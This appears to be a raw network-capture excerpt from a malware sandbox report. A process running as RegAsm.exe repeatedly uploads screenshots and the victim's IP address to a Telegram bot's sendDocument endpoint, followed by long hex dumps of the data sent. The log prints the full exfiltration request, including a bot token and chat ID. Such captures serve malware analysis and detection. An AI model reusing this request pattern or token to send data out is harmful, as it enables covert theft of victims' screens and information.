                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449756149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:25 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3188ba9618b0
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 38 62 61 39 36 31 38 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3188ba9618b0Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:25 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:26 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:26 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1823
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.449758149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:28 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd31a8e9a779cf
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 38 65 39 61 37 37 39 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd31a8e9a779cfContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
